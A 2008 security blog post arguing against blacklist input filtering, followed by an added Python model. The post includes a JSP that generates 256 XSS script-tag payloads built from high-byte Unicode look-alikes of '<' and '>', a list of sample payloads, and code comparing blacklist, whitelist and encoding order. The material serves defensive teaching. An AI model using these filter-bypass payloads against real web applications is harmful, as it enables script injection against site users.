2008-10-23

Why not to use Blacklists.

I was looking at Matt Presson's blog article about executing scripts with foreign character sets and decided to write my own JSP to generate every XSS payload that could be built from such characters. This is a perfect example of why not to use blacklists. A simple whitelist or, better, proper output encoding (mentioned in my last post) will thwart these attempts.

<%@ page language="java" contentType="text/html; charset=UTF-8"
    pageEncoding="UTF-8"%>
<%@page import="org.apache.commons.lang.StringEscapeUtils" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Insert title here</title>
</head>
<body>
<%
// One variant per possible high byte (0x00 .. 0xFF).
for(long i=0; i< 0x100; i++)
{
    long lt = 0x3C;          // '<'
    long gt = 0x3E;          // '>'
    long order = i << 8;     // high byte shifted into bits 8-15
    long LT = order | lt;    // code point whose low byte is '<'
    //out.println(Long.toHexString(LT) + " : ");
    long GT = order | gt;    // code point whose low byte is '>'
    //out.println(Long.toHexString(GT) + "<BR>");
    // Build the script tag from the two modified code points and emit it unencoded.
    String theScript = (char)LT + "script" + (char)GT + "alert(" + i + ");" +(char)LT + "/script" + (char)GT;
    out.println( theScript + "<br>");
}
%>
</body>
</html>


This will generate 256 different versions of the JavaScript payload to bypass blacklist input validation attempts. Here are a few examples. They may not display properly on this blog, so I recommend running it on your own Tomcat server.

ļscriptľalert(1);ļ/scriptľ
ȼscriptȾalert(2);ȼ/scriptȾ
̼script̾alert(3);̼/script̾
мscriptоalert(4);м/scriptо
ԼscriptԾalert(5);Լ/scriptԾ
ؼscriptؾalert(6);ؼ/scriptؾ
ܼscriptܾalert(7);ܼ/scriptܾ
࠼script࠾alert(8);࠼/script࠾
़scriptाalert(9);़/scriptा
਼scriptਾalert(10);਼/scriptਾ
଼scriptାalert(11);଼/scriptା
఼scriptాalert(12);఼/scriptా
഼scriptാalert(13);഼/scriptാ
฼script฾alert(14);฼/script฾
༼script༾alert(15);༼/script༾
ြscriptှalert(16);ြ/scriptှ
ᄼscriptᄾalert(17);ᄼ/scriptᄾ
ሼscriptሾalert(18);ሼ/scriptሾ
ጼscriptጾalert(19);ጼ/scriptጾ
ᐼscriptᐾalert(20);ᐼ/scriptᐾ
ᔼscriptᔾalert(21);ᔼ/scriptᔾ
ᘼscriptᘾalert(22);ᘼ/scriptᘾ
᜼script᜾alert(23);᜼/script᜾
ᠼscriptᠾalert(24);ᠼ/scriptᠾ
᤼script᤾alert(25);᤼/script᤾
ᨼscriptᨾalert(26);ᨼ/scriptᨾ
ᬼscriptᬾalert(27);ᬼ/scriptᬾ
᰼script᰾alert(28);᰼/script᰾
ᴼscriptᴾalert(29);ᴼ/scriptᴾ
ḼscriptḾalert(30);Ḽ/scriptḾ
ἼscriptἾalert(31);Ἴ/scriptἾ
‼script‾alert(32);‼/script‾
ℼscriptℾalert(33);ℼ/scriptℾ
∼script∾alert(34);∼/script∾
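To make the defensive point concrete, here is an added Python model of the JSP above; it is not code from the original post. It rebuilds the same 256 variants, runs them through a constructed blacklist and a constructed whitelist, and then applies HTML output encoding. The `narrow_to_low_byte` function is an assumed, illustrative model of a lossy downstream charset step that keeps only the low byte of each code point (the inverse of the JSP's `order | lt`); it does not describe any specific browser or server. It goes one step beyond the post by showing that output encoding only helps when it is applied in the final character set, after any such lossy conversion.

```python
import html
import re

# Low-byte code points of '<' and '>' that the JSP ORs with a high byte.
LT, GT = 0x3C, 0x3E


def make_variant(high_byte):
    """Build the string the JSP emits for one loop index: '<' and '>' with
    high_byte placed in bits 8-15 of the code point (0x013C, 0x023C, ...)."""
    lt = chr((high_byte << 8) | LT)
    gt = chr((high_byte << 8) | GT)
    return f"{lt}script{gt}alert({high_byte});{lt}/script{gt}"


def all_variants():
    """All 256 variants; index 0 is the plain ASCII <script> tag."""
    return [make_variant(i) for i in range(0x100)]


# Constructed blacklist: reject input that literally contains a script tag.
BLACKLIST = re.compile(r"<\s*/?\s*script", re.IGNORECASE)


def blacklist_rejects(s):
    return BLACKLIST.search(s) is not None


# Constructed whitelist for a field that should only hold a name-like value:
# letters, digits, spaces and a few punctuation marks; anything else is rejected.
WHITELIST = re.compile(r"[A-Za-z0-9 .,'-]*")


def whitelist_rejects(s):
    return WHITELIST.fullmatch(s) is None


def narrow_to_low_byte(s):
    """Assumed model of a lossy downstream step that keeps only the low 8 bits
    of each code point: U+013C becomes '<', U+013E becomes '>'.
    Illustrative only, not the behaviour of a specific product."""
    return "".join(chr(ord(c) & 0xFF) for c in s)


def html_encode(s):
    """Output encoding for an HTML text node or quoted attribute value."""
    return html.escape(s, quote=True)


def blacklist_miss_count():
    """How many of the 256 variants slip past the blacklist."""
    return sum(1 for v in all_variants() if not blacklist_rejects(v))


def whitelist_miss_count():
    """How many of the 256 variants slip past the whitelist."""
    return sum(1 for v in all_variants() if not whitelist_rejects(v))


def render_safely(untrusted):
    """Encode in the final character set: narrow first, then HTML-encode."""
    return html_encode(narrow_to_low_byte(untrusted))


def render_unsafely(untrusted):
    """Encoding before the lossy step: the high-byte '<' is untouched by
    html.escape and only becomes a real '<' afterwards."""
    return narrow_to_low_byte(html_encode(untrusted))


if __name__ == "__main__":
    print("blacklist misses:", blacklist_miss_count(), "of 256")
    print("whitelist misses:", whitelist_miss_count(), "of 256")
    v = make_variant(1)
    print("variant 1 :", repr(v))
    print("narrowed  :", narrow_to_low_byte(v))
    print("safe      :", render_safely(v))
    print("unsafe    :", render_unsafely(v))
```

Only variant 0, the plain ASCII tag, trips the blacklist; the other 255 pass it untouched, while the whitelist rejects every one of them because `(` and `;` are simply not allowed. The two `render_*` functions show the ordering caveat: `render_safely` yields `&lt;script&gt;...`, whereas `render_unsafely` produces a live `<script>` tag because the escaping ran before the conversion that turned U+013C into `<`.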
